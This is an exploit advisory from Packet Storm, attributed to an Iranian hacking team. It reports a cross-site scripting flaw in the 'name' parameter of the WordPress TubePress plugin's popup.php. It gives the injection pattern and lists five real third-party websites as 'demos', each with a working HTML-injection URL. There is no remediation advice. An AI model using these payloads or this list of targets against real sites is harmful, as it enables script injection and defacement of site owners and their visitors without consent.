WordPress Tubepress plugin version 2 suffers from a cross site scripting vulnerability.
07249b5b649b4b8a398d0f438306525211428fed75f9326abab4cb44384a3974[^][^][^][^][^][^][^][^][^][^][^]
[^] Exploit Title : Wordpress Tubepress Plugin v 2 Cross Site Scripting
[^] Exploit Author : Ashiyane Digital Security Team
[^] Vendor Homepage : https://wordpress.org/plugins/tubepress/
[^] Date: 13 Jan 2016
[^] Tested On : Win 10 | CyberFox Browser & Kali Linux | IceWeasel
[^]
[^][^][^][^][^][^][^][^][^][^][^]
[^] Vulnerable PHP File = common/ui/popup.php OR common/popup.php
[^] Vulnerable Parameter = name
[^]
[^] Attack Like :site/wp-content/plugins/tubepress/common/popup.php?name=[XSS]
[^]
[^][^][^][^][^][^][^][^][^][^][^]
[^] Demos :
[^]
[^]
http://inmafoundation.org/wp-content/plugins/tubepress/common/popup.php?name=</title><font
color=white>Ashiyane</font>
[^]
[^]
http://www.frenzygraphics.com/wp-content/plugins/tubepress/common/popup.php?name=</title><font
color=white>Ashiyane</font>
[^]
[^]
http://www.brothersgonnaworkitout.com/clientarea/greenparty/wp-content/plugins/tubepress/common/popup.php?name=</title><font
color=white>Ashiyane</font>
[^]
[^]
http://www.twisters.info/wp-content/plugins/tubepress/common/popup.php?name=</title><font
color=white>Ashiyane</font>
[^]
[^]
http://trueworldonline.com/wordpress/wp-content/plugins/tubepress/common/popup.php?name=</title><font
color=white>Ashiyane</font>
[^]
[^][^][^][^][^][^][^][^][^][^][^]
[^] Discovered by : Ac!D
[^] tnQ: EhSan D3s!6n37 ,H.empire , M.hidden , Linx64 , B0z0rgmehr ,
Maziar , N3TC@T
[^] M.a.M.a.D , M.hacking , Sh.BlackHAT , V For vendetta , Sh.Cloner & Hassan
[^][^][^][^][^][^][^][^][^][^][^]
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed